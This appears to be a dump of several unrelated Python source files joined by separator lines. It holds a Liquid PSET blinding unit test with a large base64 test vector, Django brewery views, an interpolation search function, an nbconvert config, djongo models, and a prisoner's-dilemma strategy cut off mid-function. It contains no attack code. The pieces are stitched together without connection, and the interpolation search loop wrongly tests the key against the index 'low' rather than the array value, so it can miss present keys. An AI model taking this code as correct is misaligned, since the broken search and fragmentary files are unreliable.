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"
class TaprootTest(TestCase):
# run blind-unblind in a thread or multiple threads
def unblind_thread(self, pset, i, unblinded=None, blinded=None, reblinded=None):
# check we can unblind
pset.unblind(mbkey)
for inp in pset.inputs:
self.assertIsNotNone(inp.value)
self.assertIsNotNone(inp.asset)
if unblinded:
self.assertEqual(str(pset), unblinded)
# check we can blind
seed = tagged_hash("liquid/blinding_seed", mbkey.secret)
pset.blind(seed)
for out in pset.outputs:
if out.blinding_pubkey is None:
continue
self.assertIsNotNone(out.value_commitment)
self.assertIsNotNone(out.asset_commitment)
self.assertIsNotNone(out.range_proof)
self.assertIsNotNone(out.surjection_proof)
if blinded:
self.assertEqual(str(pset), blinded)
# check we can add extra message into the rangeproof
txseed = pset.txseed(seed)
nonce = tagged_hash("liquid/range_proof", txseed + (0).to_bytes(4, "little"))
out = pset.outputs[i]
msg = b"I can put any message here"
out.reblind(nonce, extra_message=msg)
if reblinded:
self.assertEqual(str(pset), reblinded)
# check we can unblind this output and extract the message
vout = out.blinded_vout
bkey = slip77.blinding_key(mbkey, vout.script_pubkey)
res = vout.unblind(bkey.secret, message_length=200)
value, asset, vbf, abf, extramsg, min_value, max_value = res
self.assertEqual(extramsg.rstrip(b"\x00"), msg)
def test_threading(self):
# reverse order for pset inputs and outputs
pset = PSET.from_string(B64PSET)
pset.inputs = pset.inputs[::-1]
pset.outputs = pset.outputs[::-1]
pset2 = PSET.from_string(str(pset))
pset1 = PSET.from_string(B64PSET)
self.assertTrue(str(pset1) != str(pset2))
tarr = [
threading.Thread(target=self.unblind_thread, args=(PSET.from_string(str(pset2)),-1))
for i in range(5)
]
tarr.append(threading.Thread(target=self.unblind_thread, args=(pset1,0,UNBLINDED,BLINDED,REBLINDED)))
tarr += [
threading.Thread(target=self.unblind_thread, args=(PSET.from_string(str(pset2)),-1))
for i in range(5)
]
for t in tarr:
t.start()
for t in tarr:
t.join()
self.assertEqual(str(pset1), REBLINDED)
|
from django.views.generic import ListView, DetailView, CreateView
from django.contrib.auth.mixins import LoginRequiredMixin
from django.db.models.aggregates import Sum, Max
from .models import Brewery
from beerhunter.beers.models import Beer
class BreweryListView(ListView):
model = Brewery
queryset = Brewery.objects.annotate(rating=Sum('brewered__vote__value'))
context_object_name = "brewery_list"
# def get_context_data(self, **kwargs):
# ctx = super().get_context_data(**kwargs)
# # all_beers = Beer.objects.values('brewery__name').annotate(total_rating=Sum('vote__value'))
# # ctx['total_rating'] = Beer.objects.values('brewery__name').annotate(total_rating=Sum('vote__value'))
# # brewery_with_rating = Brewery.objects.values('title').annotate(most_rated=Max('brewered__vote__value'))
# brewery_with_rating = Brewery.objects.all().annotate(
# most_rated=Beer.objects.all_with_related_instances_and_score().order_by('-score')
# )
# rating = Beer.objects.all_with_related_instances_and_score().order_by('-score')[0]
# print(f'We have for all beers {brewery_with_rating}')
# # print(f'Rating for {brewery_with_rating[5]} is {brewery_with_rating[5]}')
# return ctx
class BreweryDetailView(DetailView):
model = Brewery
def get_context_data(self, **kwargs):
print(self)
ctx = super().get_context_data(**kwargs)
print('initial Brewery ctx is, ', ctx)
qs_beers = Beer.objects.all_with_related_instances_and_score()
print('qs_beers are, ', qs_beers)
brewery_beers = qs_beers.filter(brewery=ctx['brewery'])
brewery_rating = 0
for item in brewery_beers:
if not item.score:
item.score = 0
brewery_rating += item.score
# brewery_rating = brewery_rating / len(brewery_beers)
ctx['connected_beers'] = brewery_beers
ctx['rating'] = brewery_rating
print('Final Brewery ctx is, ', ctx)
return ctx
class BreweryCreateView(LoginRequiredMixin, CreateView):
model = Brewery
template_name = "breweries/brewery_form.html"
fields = [
'title',
'country_of_origin'
]
|
"""
Python implementation of the Interpolation Search algorithm.
Given a sorted array in increasing order, interpolation search calculates
the starting point of its search according to the search key.
FORMULA: start_pos = low + [ (x - arr[low])*(high - low) / (arr[high] - arr[low]) ]
Doc: https://en.wikipedia.org/wiki/Interpolation_search
Time Complexity: O(log2(log2 n)) for average cases, O(n) for the worst case.
The algorithm performs best with uniformly distributed arrays.
"""
from typing import List
def interpolation_search(array: List[int], search_key: int) -> int:
"""
:param array: The array to be searched.
:param search_key: The key to be searched in the array.
:returns: Index of search_key in array if found, else -1.
Example
>>> interpolation_search([1, 10, 12, 15, 20, 41, 55], 20)
4
>>> interpolation_search([5, 10, 12, 14, 17, 20, 21], 55)
-1
"""
# highest and lowest index in array
high = len(array) - 1
low = 0
while low <= high and search_key in range(low, array[high] + 1):
# calculate the search position
pos = low + int(((search_key - array[low]) *
(high - low) / (array[high] - array[low])))
# if array[pos] equals the search_key then return pos as the index
if search_key == array[pos]:
return pos
# if the search_key is greater than array[pos] restart the search with the
# subarray greater than array[pos]
elif search_key > array[pos]:
low = pos + 1
# in this case start the search with the subarray smaller than current array[pos]
elif search_key < array[pos]:
high = pos - 1
return -1
|
import os
import jupyter_contrib_nbextensions.nbconvert_support
jcnbe_dir = os.path.dirname(jupyter_contrib_nbextensions.__file__)
pp_mod_name = 'jupyter_contrib_nbextensions.nbconvert_support.pp_highlighter'
c = get_config() # noqa
c.NbConvertApp.export_format = "latex"
c.Exporter.extra_template_paths = [
'.',
jupyter_contrib_nbextensions.nbconvert_support.templates_directory(),
os.path.join(jcnbe_dir, 'nbextensions', 'highlighter')
]
c.Exporter.preprocessors = [pp_mod_name + '.HighlighterPreprocessor']
c.NbConvertApp.postprocessor_class = pp_mod_name + '.HighlighterPostProcessor'
# latex
c.Exporter.template_file = 'highlighter.tplx'
# html
# c.Exporter.template_file = 'highlighter.tpl'
|
# Standard Library
import os
# Django Library
from djongo import models
from django.utils.translation import ugettext_lazy as _
# Localfolder Library
from ..rename_image import RenameImage
from .usercustom import PyUser
def image_path(instance, filename):
return os.path.join('publication', str(instance.pk) + '.' + filename.rsplit('.', 1)[1])
class PyPublication(models.Model):
'''Publication Model
'''
id = models.AutoField(primary_key=True)
content = models.CharField(_("Content"), max_length=500)
likes = models.IntegerField(_("Likes"), default = 0)
created_at = models.DateTimeField(_("Created_at"), auto_now_add = True)
updated_at = models.DateTimeField(_("Update_at"), auto_now = True)
user = models.ForeignKey(PyUser, on_delete=models.CASCADE, null=False, blank=False)
class Meta:
verbose_name = _('Publication')
verbose_name_plural = _('Publications')
# comments = models.ArrayField(model_container=PyComment)
class PyComment(models.Model):
'''Comments Model
'''
id = models.AutoField(primary_key=True)
likes = models.IntegerField(_("Likes"), default = 0)
content = models.CharField(_("Content"), max_length=300)
created_at = models.DateTimeField(_("Created_at"), auto_now_add = True)
user = models.ForeignKey(PyUser, on_delete=models.CASCADE, null=False, blank=False)
publication = models.ForeignKey(PyPublication, on_delete=models.CASCADE, null=False, blank=False)
class Meta:
verbose_name = _('Comment')
verbose_name_plural = _('Comments')
|
from decimal import Decimal
import numpy
def strategy(history, memory):
"""
Nice Patient Comparative Tit for Tat (NPCTT):
1. Nice: Never initiate defection, else face the wrath of the Grudge.
2. Patient: Respond to defection with defection, unless it was in possibly
response to my defection. Give opponent a chance to cooperate again since,
even if they backstab me a few more times, we'll both come out ahead.
I don't have to worry about this causing my opponent to actually win
because the Grudge and Tit for Tat will penalize them heavily for
initiating defection.
3. Comparative: Before cooperating in forgiveness, we compare number of
defection between ours and theirs. If D(ours)/D(theirs) is higher than
50%, we forgive.
4. Tit for Tat: (see Patient)
This strategy incorporate enemy that defect in late game and not too fast judging
early impression.
"""
num_rounds = history.shape[1]
opponents_last_move = history[1, -1] if num_rounds >= 1 else 1
our_second_last_move = history[0, -2] if num_rounds >= 2 else 1
# if opponent defects more often, then screw 'em
LOWER_BOUND = Decimal(1) / Decimal(2) # exclusive bound
our_history = history[0, 0:num_rounds]
opponent_history = history[1, 0:num_rounds]
if num_rounds == 0:
defection_ratio = 1
else:
our_stats = dict(zip(*numpy.unique(our_history, return_counts=True)))
